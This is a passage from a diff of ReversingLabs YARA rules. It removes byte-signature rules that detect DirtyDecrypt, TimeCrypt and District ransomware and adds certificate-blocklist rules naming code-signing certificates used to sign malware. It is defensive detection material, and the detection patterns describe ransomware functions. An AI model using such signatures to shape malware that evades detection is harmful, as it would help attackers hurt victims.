C1 C1 E8 ?? 33 C8 8B C1 25 ?? ?? - ?? ?? C1 E0 ?? 33 C8 8B C1 25 ?? ?? ?? ?? C1 E0 ?? 33 C8 8B C1 C1 E8 ?? 33 C1 C3 - } - $entrypoint_all = { - 83 EC ?? E8 ?? ?? ?? ?? 50 FF 15 - } - condition: - uint16(0)==0x5A4D and ((($file_loop_1 and $encrypt_data_1 and $decrypt_data_1 and $decrypt_strings_1 and $decrypt_1) or ($file_loop_2 and $encrypt_data_2 and $decrypt_data_2 and $decrypt_strings_2 and $decrypt_2) or ($file_loop_3 and $encrypt_data_3 and $decrypt_data_3 and $decrypt_3)) and ($entrypoint_all at pe.entry_point)) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Trambambon LLC" and pe.signatures[i].serial=="53:33:d3:07:9d:8a:fd:a7:15:70:37:75:e1:38:99:91" and 1239148800<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Win32_Ransomware_Dirtydecrypt : TC_DETECTION MALICIOUS MALWARE FILE +rule REVERSINGLABS_Cert_Blocklist_139A7Ee1F1A7735C151089755Df5D373 : INFO FILE { meta: - description = "Yara rule that detects DirtyDecrypt ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "f4d69c3e-a082-5bc9-bf72-4cc330d3de74" - date = "2020-07-15" - modified = "2020-07-15" + id = "eaab67a1-ed7a-58f3-afb3-3637c3b72020" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.DirtyDecrypt.yara#L3-L112" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "eb6a1c376b0739848b523e741d0d1ebdbc87056d51931fb94c744aa094d6479f" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L13204-L13220" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "86072fef7d1488dc257c3ca8fbb99620ec06f8ecb671b4e20d09d0ce6cc8601d" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "DirtyDecrypt" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $dd_ep = { - 55 8B EC 83 EC ?? E8 ?? ?? ?? ?? 85 C0 0F 84 BF 00 00 00 C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 74 - 1F 6A ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 85 C0 74 07 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? EB - 09 8B 4D ?? 83 C1 ?? 89 4D ?? 83 7D ?? ?? 73 15 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 89 44 95 ?? EB DC 6A ?? 68 - ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? - 8B 15 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 6A ?? 6A ?? 6A - ?? 8D 55 ?? 52 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? 33 C0 8B E5 5D C2 ?? ?? - } - $dd_hash = { - 55 8B EC 83 EC ?? C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 0F 84 D5 00 00 00 83 7D ?? ?? 0F 84 CB 00 00 00 83 7D ?? ?? 0F 84 C1 - 00 00 00 83 7D ?? ?? 0F 84 B7 00 00 00 83 7D ?? ?? 0F 84 AD 00 00 00 83 7D ?? ?? 0F 84 A3 00 00 00 C7 45 ?? ?? ?? ?? ?? - 8D 45 ?? 50 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 85 C0 75 02 EB 6F 83 7D ?? ?? 76 2A 6A ?? 6A ?? 8B - 55 ?? 52 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 02 EB 51 8B 4D ?? 83 E9 ?? 89 4D ?? 8B 55 ?? 83 C2 ?? 89 55 ?? 6A ?? 8B - 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 85 C0 75 02 EB 25 6A ?? 6A ?? 8B 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 8B - 45 ?? 50 FF 15 ?? ?? ?? ?? 89 45 ?? 33 C9 0F 85 74 FF FF FF 83 7D ?? ?? 74 0A 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 8B 45 ?? 8B - E5 5D C2 ?? ?? - } - $dd_getkey = { - 55 8B EC 83 EC ?? C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 74 31 C7 45 ?? ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 8D 4D ?? 51 6A ?? 8B 55 - ?? 52 FF 15 ?? ?? ?? ?? 85 C0 75 07 C7 45 ?? ?? ?? ?? ?? 8B 45 ?? C1 E8 ?? 89 45 ?? 8B 45 ?? 8B E5 5D C2 ?? ?? - } - $dd_destroykey = { - 55 8B EC 83 7D ?? ?? 74 0A 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 5D C2 - } - $dd_importkey = { - 55 8B EC 51 C7 45 ?? ?? ?? ?? ?? 8D 45 ?? 50 6A ?? 6A ?? 8B 4D ?? 8B 51 ?? 52 8B 45 ?? 8B 08 51 8B 55 ?? 52 FF 15 ?? ?? - ?? ?? 8B 45 ?? 8B E5 5D C2 ?? ?? - } - $dd_decrypt = { - 55 8B EC 83 EC ?? C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 0F 84 22 01 00 00 83 7D ?? ?? 0F 84 18 01 00 00 83 7D ?? ?? 0F 84 0E - 01 00 00 83 7D ?? ?? 0F 84 04 01 00 00 83 7D ?? ?? 0F 84 FA 00 00 00 8B 45 ?? 50 E8 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 33 D2 - F7 75 ?? 0F AF 45 ?? 89 45 ?? 8B 4D ?? 89 4D ?? 8B 55 ?? 8B 02 03 45 ?? 89 45 ?? 8B 4D ?? 8B 11 03 55 ?? 52 8B 45 ?? 8B - 08 51 6A ?? E8 ?? ?? ?? ?? 8B 55 ?? 89 02 8B 45 ?? 83 38 ?? 0F 84 A7 00 00 00 8B 4D ?? 8B 11 8B 45 ?? 03 10 89 55 ?? 83 - 7D ?? ?? 74 61 6A ?? 8B 4D ?? 51 8B 55 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 45 ?? - 89 45 ?? 8D 4D ?? 51 8B 55 ?? 52 6A ?? 6A ?? 6A ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 02 EB 1D 8B 4D ?? 03 4D ?? 89 - 4D ?? 8B 55 ?? 2B 55 ?? 89 55 ?? 8B 45 ?? 03 45 ?? 89 45 ?? EB 99 83 7D ?? ?? 75 15 8B 4D ?? 89 4D ?? 8B 55 ?? 8B 45 ?? - 2B 02 8B 4D ?? 89 01 EB 18 8B 55 ?? 8B 02 50 8B 4D ?? 8B 11 52 6A ?? E8 ?? ?? ?? ?? 8B 4D ?? 89 01 8B 45 ?? 8B E5 5D C2 - ?? ?? - } - $dd_encrypt = { - 55 8B EC 83 EC ?? C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 0F 84 89 01 00 00 83 7D ?? ?? 0F 84 7F 01 00 00 83 7D ?? ?? 0F 84 75 - 01 00 00 83 7D ?? ?? 0F 84 6B 01 00 00 83 7D ?? ?? 0F 84 61 01 00 00 8B 45 ?? 50 E8 ?? ?? ?? ?? 89 45 ?? 8B 4D ?? 83 E9 - ?? 89 4D ?? 8B 55 ?? 89 55 ?? 6A ?? 8D 45 ?? 50 6A ?? 6A ?? 6A ?? 6A ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 85 C0 0F 84 26 01 - 00 00 8B 55 ?? 3B 55 ?? 76 08 8B 45 ?? 89 45 ?? EB 06 8B 4D ?? 89 4D ?? 8B 55 ?? 89 55 ?? 8B 45 ?? 33 D2 F7 75 ?? 0F AF - 45 ?? 8B 4D ?? 8B 11 03 D0 03 55 ?? 89 55 ?? 8B 45 ?? 50 8B 4D ?? 8B 11 52 6A ?? E8 ?? ?? ?? ?? 8B 4D ?? 89 01 8B 55 ?? - 83 3A ?? 0F 84 CF 00 00 00 8B 45 ?? 8B 08 8B 55 ?? 03 0A 89 4D ?? 83 7D ?? ?? 0F 84 84 00 00 00 8B 45 ?? 3B 45 ?? 73 08 - 8B 4D ?? 89 4D ?? EB 06 8B 55 ?? 89 55 ?? 8B 45 ?? 89 45 ?? 6A ?? 8B 4D ?? 51 8B 55 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B - 4D ?? 89 4D ?? 8B 55 ?? 52 8D 45 ?? 50 8B 4D ?? 51 6A ?? 6A ?? 6A ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 85 C0 75 02 EB 2D 8B - 45 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 55 ?? 03 55 ?? 89 55 ?? 8B 45 ?? 2B 45 ?? 89 45 ?? 8B 4D ?? 03 4D ?? 89 4D ?? E9 - 72 FF FF FF 83 7D ?? ?? 75 16 8B 55 ?? 8B 45 ?? 2B 02 8B 4D ?? 89 01 C7 45 ?? ?? ?? ?? ?? EB 18 8B 55 ?? 8B 02 50 8B 4D - ?? 8B 11 52 6A ?? E8 ?? ?? ?? ?? 8B 4D ?? 89 01 8B 45 ?? 8B E5 5D C2 ?? ?? - } - $dd_provparam = { - 55 8B EC 83 EC ?? 83 7D ?? ?? 0F 84 94 00 00 00 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 6A ?? 6A ?? - 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 85 C0 74 3F 8B 55 ?? 83 C2 ?? 52 E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 74 2A 6A ?? 8D 45 ?? - 50 8B 4D ?? 51 6A ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 85 C0 75 10 8B 45 ?? 50 E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 8B - 4D ?? 51 FF 15 ?? ?? ?? ?? 83 7D ?? ?? 74 1D 6A ?? 6A ?? 6A ?? 8B 55 ?? 52 8D 45 ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 51 E8 - ?? ?? ?? ?? 8B E5 5D C2 ?? ?? - } - $dd_acquirecontext = { - 55 8B EC 83 EC ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 74 0B 8B 45 ?? 0D ?? ?? ?? ?? 89 45 ?? C7 45 ?? - ?? ?? ?? ?? 83 7D ?? ?? 75 07 C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 03 45 ?? 50 6A ?? 6A ?? 6A ?? 8D 4D ?? 51 E8 ?? ?? ?? - ?? 8B 55 ?? 52 6A ?? 8B 45 ?? 50 8D 4D ?? 51 8D 55 ?? 52 FF 15 ?? ?? ?? ?? 85 C0 75 39 8B 45 ?? 83 C8 ?? 50 6A ?? 8B 4D - ?? 51 8D 55 ?? 52 8D 45 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 1A 6A ?? 6A ?? 6A ?? 8D 4D ?? 51 8D 55 ?? 52 FF 15 ?? ?? ?? ?? - 85 C0 75 02 EB 0E 6A ?? FF 15 ?? ?? ?? ?? 83 7D ?? ?? 74 9D 8B 45 ?? 8B E5 5D C2 ?? ?? - } - $dd_mrwhite = { - 55 8B EC 81 EC ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 0F 84 64 01 00 00 E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 6A ?? 8D - 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 74 12 83 3D ?? ?? ?? ?? ?? 74 09 83 3D ?? ?? ?? ?? ?? 75 05 E9 13 - 01 00 00 6A ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 85 C0 75 05 E9 F0 00 00 00 8B 95 - ?? ?? ?? ?? 52 6A ?? 6A ?? 6A ?? 8B 45 ?? 50 8D 8D ?? ?? ?? ?? 51 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 3D ?? ?? ?? ?? 74 - 05 E9 C0 00 00 00 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 85 C0 74 09 83 BD ?? ?? ?? ?? ?? 73 05 E9 9B - 00 00 00 8B 95 ?? ?? ?? ?? 52 8B 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 - 75 02 EB 72 8B 8D ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B 02 83 C0 ?? 3B 85 ?? ?? ?? ?? 76 02 EB 51 8B 8D ?? - ?? ?? ?? 83 39 ?? 74 3E 0F B7 95 ?? ?? ?? ?? 83 FA ?? 75 32 8B 85 ?? ?? ?? ?? 8B 08 51 8B 95 ?? ?? ?? ?? 83 C2 ?? 52 6A - ?? 8D 85 ?? ?? ?? ?? 50 8B 0D ?? ?? ?? ?? 51 8B 15 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 89 45 ?? 33 C0 0F 85 CD FE FF FF 8D 8D - ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 8B 45 ?? 8B E5 5D C2 ?? ?? - } - condition: - uint16(0)==0x5A4D and ($dd_ep at pe.entry_point) and $dd_hash and $dd_getkey and $dd_destroykey and $dd_importkey and $dd_decrypt and $dd_encrypt and $dd_provparam and $dd_acquirecontext and $dd_mrwhite + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Yongli Li" and pe.signatures[i].serial=="13:9a:7e:e1:f1:a7:73:5c:15:10:89:75:5d:f5:d3:73" and 1476057600<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Timecrypt : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_74Dbe83082E1B3Dfa29F9C24 : INFO FILE { meta: - description = "Yara rule that detects TimeCrypt ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "38a0c383-8be6-5258-aa93-0cf09b18e5f7" - date = "2021-12-06" - modified = "2021-12-06" + id = "dbb75cf2-1b48-52f1-8d06-e35d48c4fea4" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/ByteCode.MSIL.Ransomware.TimeCrypt.yara#L1-L69" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "6849d6d5010d7bcb4052c10d5bd7cc29320ffc986f36289b272a1e9a8d14fab9" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L13222-L13238" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "1fdf6471d0b869df1a8630108cdaf1cc97d33e91d4726073913cdc54c7cf0042" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "TimeCrypt" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $find_files = { - 7E ?? ?? ?? ?? 0A 16 0B 38 ?? ?? ?? ?? 73 ?? ?? ?? ?? 0C 08 06 07 9A 7D ?? ?? ?? ?? 73 - ?? ?? ?? ?? 0D 09 08 7D ?? ?? ?? ?? 09 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 7D ?? ?? ?? ?? 09 - 28 ?? ?? ?? ?? 7D ?? ?? ?? ?? 09 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 09 7B ?? ?? ?? ?? 28 ?? - ?? ?? ?? 09 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 09 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 09 7B ?? ?? - ?? ?? 72 ?? ?? ?? ?? 09 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 09 7B ?? ?? ?? ?? 7B ?? ?? ?? ?? - 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? - ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 2B ?? 09 7B ?? ?? ?? ?? 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 - ?? ?? ?? ?? 2C ?? 1B 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 2B ?? 1F ?? 28 ?? ?? ?? ?? 73 - ?? ?? ?? ?? 13 ?? 11 ?? 2D ?? 2A 11 ?? 6F ?? ?? ?? ?? 09 FE 06 ?? ?? ?? ?? 73 ?? ?? ?? - ?? 28 ?? ?? ?? ?? 26 11 ?? 6F ?? ?? ?? ?? 09 FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 28 ?? ?? - ?? ?? 26 07 17 58 0B 07 06 8E 69 3F ?? ?? ?? ?? 2A - } - $encrypt_files = { - 02 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 73 ?? ?? ?? ?? 0A 06 03 6F ?? ?? ?? ?? 06 02 6F - ?? ?? ?? ?? 26 06 02 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? DE ?? 06 2C ?? 06 6F - ?? ?? ?? ?? DC 02 17 28 ?? ?? ?? ?? DE ?? 26 DE ?? 2A - } - $send_http_request = { - 1C 8D ?? ?? ?? ?? 25 16 72 ?? ?? ?? ?? A2 25 17 02 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? - ?? ?? ?? 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? A2 25 18 72 ?? ?? ?? ?? A2 25 19 - 03 A2 25 1A 72 ?? ?? ?? ?? A2 25 1B 04 28 ?? ?? ?? ?? A2 28 ?? ?? ?? ?? 0A 73 ?? ?? ?? - ?? 25 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 06 6F ?? ?? ?? ?? 6F - ?? ?? ?? ?? 26 DE ?? 26 DE ?? 2A - } - $send_dns_request = { - 1C 8D ?? ?? ?? ?? 25 16 04 28 ?? ?? ?? ?? A2 25 17 72 ?? ?? ?? ?? A2 25 18 03 A2 25 19 - 72 ?? ?? ?? ?? A2 25 1A 02 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? - 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? A2 25 1B 72 ?? ?? ?? ?? A2 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? - 26 DE ?? 26 DE ?? 2A - } - condition: - uint16(0)==0x5A4D and ($find_files) and ($encrypt_files) and ($send_http_request) and ($send_dns_request) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "EVANGEL TECHNOLOGY(HK) LIMITED" and pe.signatures[i].serial=="74:db:e8:30:82:e1:b3:df:a2:9f:9c:24" and 1468817578<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_District : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_0A466553A6391Aafd181B400266C7B18 : INFO FILE { meta: - description = "Yara rule that detects District ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "fc6abbc7-66f9-56e6-8106-5f360f25b092" - date = "2020-07-15" - modified = "2020-07-15" + id = "ef8ff250-840f-5b55-b0c7-85ca54aadc59" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.District.yara#L1-L194" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "9ce395636fd7719f503726df82998e1ac72e9e80fd7a4534bd2251ac9283af38" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L13240-L13256" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "cb21e5759887904d6a38cd1b363610ebc0bfd9a357050c602210468992815cbe" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "District" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $encrypt_files_p1 = { - 55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? 53 56 57 83 EC ?? C7 44 24 ?? ?? ?? ?? ?? 8D 44 - 24 ?? 8B F1 8D 4D ?? 50 E8 ?? ?? ?? ?? 40 C7 44 24 ?? ?? ?? ?? ?? 6A ?? 33 C9 C7 44 - 24 ?? ?? ?? ?? ?? 50 8D 45 ?? 66 89 4C 24 ?? 50 8D 4C 24 ?? E8 ?? ?? ?? ?? 83 EC ?? - C7 44 24 ?? ?? ?? ?? ?? 8D 44 24 ?? 8D 4D ?? 50 E8 ?? ?? ?? ?? 40 C7 84 24 ?? ?? ?? - ?? ?? ?? ?? ?? 33 C9 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 50 51 8D 45 ?? 66 89 8C 24 ?? - ?? ?? ?? 50 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? C7 44 24 ?? ?? ?? ?? ?? 8D - 44 24 ?? 8D 4C 24 ?? 50 E8 ?? ?? ?? ?? 40 C7 44 24 ?? ?? ?? ?? ?? 6A ?? 33 C9 C7 44 - 24 ?? ?? ?? ?? ?? 50 8D 44 24 ?? 66 89 4C 24 ?? 50 8D 4C 24 ?? E8 ?? ?? ?? ?? 83 EC - ?? C7 44 24 ?? ?? ?? ?? ?? 8D 44 24 ?? 8D 4C 24 ?? 50 E8 ?? ?? ?? ?? 33 C9 C7 44 24 - ?? ?? ?? ?? ?? 50 51 8D 44 24 ?? 66 89 4C 24 ?? 50 8D 4C 24 ?? C7 44 24 ?? ?? ?? ?? - ?? E8 ?? ?? ?? ?? 33 C0 C7 44 24 ?? ?? ?? ?? ?? 6A ?? 50 66 89 44 24 ?? 8D 4C 24 ?? - 8D 45 ?? C7 44 24 ?? ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 6A ?? 6A ?? 56 8D 4C 24 ?? E8 ?? - ?? ?? ?? 83 7D ?? ?? 8D 45 ?? 6A ?? 0F 43 45 ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 - ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B F8 83 FF ?? 0F 84 ?? ?? ?? ?? 6A ?? 57 FF 15 ?? - ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 66 0F 6E C0 F3 0F E6 C0 C1 E8 ?? F2 0F 58 04 C5 - ?? ?? ?? ?? F2 0F 59 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 56 E8 ?? ?? ?? ?? 56 8B D8 - } - $encrypt_files_p2 = { - E8 ?? ?? ?? ?? 83 C4 ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 0F 1F 40 ?? 0F 1F 84 00 - ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 6A ?? A3 ?? ?? ?? ?? 8D 44 24 ?? 50 56 - 53 57 89 0D ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? - FF 15 ?? ?? ?? ?? 56 FF 74 24 ?? 8B D3 E8 ?? ?? ?? ?? 8B 44 24 ?? 83 C4 ?? F7 D8 6A - ?? 6A ?? 50 57 FF 15 ?? ?? ?? ?? 6A ?? 8D 44 24 ?? 50 56 FF 74 24 ?? 57 FF 15 ?? ?? - ?? ?? 83 6C 24 ?? ?? 75 ?? 53 E8 ?? ?? ?? ?? FF 74 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 57 - FF 15 ?? ?? ?? ?? 83 7C 24 ?? ?? 8D 4C 24 ?? 8D 45 ?? 0F 43 4C 24 ?? 83 7D ?? ?? 51 - 0F 43 45 ?? 50 FF 15 ?? ?? ?? ?? 8B 44 24 ?? 83 F8 ?? 72 ?? 40 8D 4C 24 ?? 50 FF 74 - 24 ?? E8 ?? ?? ?? ?? 33 C0 C7 44 24 ?? ?? ?? ?? ?? 66 89 44 24 ?? 8B 44 24 ?? C7 44 - 24 ?? ?? ?? ?? ?? 83 F8 ?? 72 ?? 40 8D 4C 24 ?? 50 FF 74 24 ?? E8 ?? ?? ?? ?? 33 C0 - C7 44 24 ?? ?? ?? ?? ?? 66 89 44 24 ?? 8B 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 83 F8 ?? - 72 ?? 40 8D 4C 24 ?? 50 FF 74 24 ?? E8 ?? ?? ?? ?? 33 C0 C7 44 24 ?? ?? ?? ?? ?? 66 - 89 44 24 ?? 8B 84 24 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 83 F8 ?? 72 ?? 40 8D 4C 24 - ?? 50 FF 74 24 ?? E8 ?? ?? ?? ?? 33 C0 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 66 89 44 24 - ?? 8B 44 24 ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 83 F8 ?? 72 ?? 40 8D 4C 24 ?? 50 FF - 74 24 ?? E8 ?? ?? ?? ?? 33 C0 C7 44 24 ?? ?? ?? ?? ?? 66 89 44 24 ?? 89 44 24 ?? 8B - 45 ?? 83 F8 ?? 72 ?? 8B 4D ?? 40 3D ?? ?? ?? ?? 77 ?? 03 C0 3D ?? ?? ?? ?? 72 ?? F6 - C1 ?? 75 ?? 8B 41 ?? 3B C1 73 ?? 2B C8 83 F9 ?? 72 ?? 83 F9 ?? 77 ?? 8B C8 51 E8 ?? - ?? ?? ?? 83 C4 ?? 5F 5E 5B 8B E5 5D C2 - } - $find_files = { - 53 55 56 57 6A ?? 8B F1 E8 ?? ?? ?? ?? 83 C4 ?? 8D 9E ?? ?? ?? ?? 8B E8 53 68 ?? ?? - ?? ?? FF 15 ?? ?? ?? ?? 53 50 89 45 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8D BE ?? ?? ?? - ?? 0F 1F 80 ?? ?? ?? ?? F6 03 ?? 57 74 ?? 8B CE E8 ?? ?? ?? ?? 84 C0 75 ?? 57 E8 ?? - ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 50 8B CE E8 ?? ?? ?? ?? EB ?? E8 ?? ?? ?? ?? 84 C0 74 - ?? 8B CE E8 ?? ?? ?? ?? 53 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 80 7C 24 ?? ?? 75 - ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 55 E8 ?? ?? ?? ?? 83 C4 ?? 5F 5E 5D - 5B C2 - } - $enum_resources_1_p1 = { - B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 55 56 57 33 C0 C7 44 24 ?? ?? ?? ?? ?? 66 89 44 24 - ?? 8B DA 8D 44 24 ?? 89 5C 24 ?? 50 51 6A ?? 6A ?? 6A ?? C7 44 24 ?? ?? ?? ?? ?? FF - 15 ?? ?? ?? ?? 85 C0 74 ?? 3D ?? ?? ?? ?? 75 ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? - 50 68 ?? 